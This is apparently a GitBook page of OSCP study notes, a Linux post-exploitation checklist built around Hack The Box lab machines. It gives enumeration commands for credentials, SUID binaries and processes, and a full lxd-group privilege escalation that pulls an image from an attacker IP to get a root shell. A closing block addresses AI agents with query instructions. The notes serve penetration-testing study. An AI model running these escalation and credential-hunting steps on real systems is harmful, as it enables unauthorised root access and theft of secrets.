# Post Exploit Checks ## General Enumeration * Know if the environment is a real host ```bash ls -la / # check if the root dir has .[dot] files we can know if its a docker env hostname ``` * Know the permissions of the user ```bash sudo -l id ``` * Know the users ```bash cat /etc/passwd ``` * Check for `.htaccess` file * `/etc/apache2/sites-enabled/*` * `/etc/nginx/nginx.conf` * `/etc/ssh/sshd_config` * Application Specific Configs : wp-config, settings.php etc.., ## Groups Exploitation ### 4(adm) * The adm group members can view the log files ```bash cd /var/log grep -EnRi password . ``` **Machine:** * Academy - HTB : * Doctor - HTB : ### 116(lxd) * The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment ```bash # attacker machine git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder ./build-alpine # victim machine lxd init # yes to all wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage lxc image list lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite lxc start ignite lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container cd /mnt/root # provides the root of the victim machine ``` ## Files Enumeration * Find suid binaries ```bash find / -perm /4000 -ls 2>/dev/null ``` * Find Writeable files ```bash find / -type f -writable 2>/dev/null | grep -v proc ``` * Find files owned by the user (group specific) ```bash # ! -path - omits files from the mentioned directory # -group - group name find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null ``` * Locations to check ```bash ls /opt ls /usr/local/bin ls ~/.local/bin ``` ## Background Jobs Enumeration * Crontabs ```bash crontab -l cat /etc/crontab ``` * Enumerate processes with [pspy](https://github.com/DominicBreuker/pspy) ## Network Enumeration * Know the network adapters ( might be communicating internally ) ```bash ip a ``` * Open Ports and services ```bash netstat -antp # look for unusal services running interally or mysql service ``` ## Process Enumeration * Enumerate the services that are running ```bash ps aux ``` * Get more information about the process (like the passed arguments etc.., it might contain passwords ) ```bash # know the process id from ps aux cat /proc//cmd ``` ## Web Directories * Check the web directories for passwords ```bash /var/www/* ``` ## MYSQL * If MYSQL is running as **root** in the machine check for priv esc via library * * * The `\G` option in the sql query of the mysql prints the information in a prettier format ```bash # Connecting to mysql mysql -u root -p # password prompt mysql> select * from wp_users \G # instead of "select * from wp_users;" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dhaneshsivasamy07.gitbook.io/oscp-2022/linux-post-exploitation/post-exploit-checks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.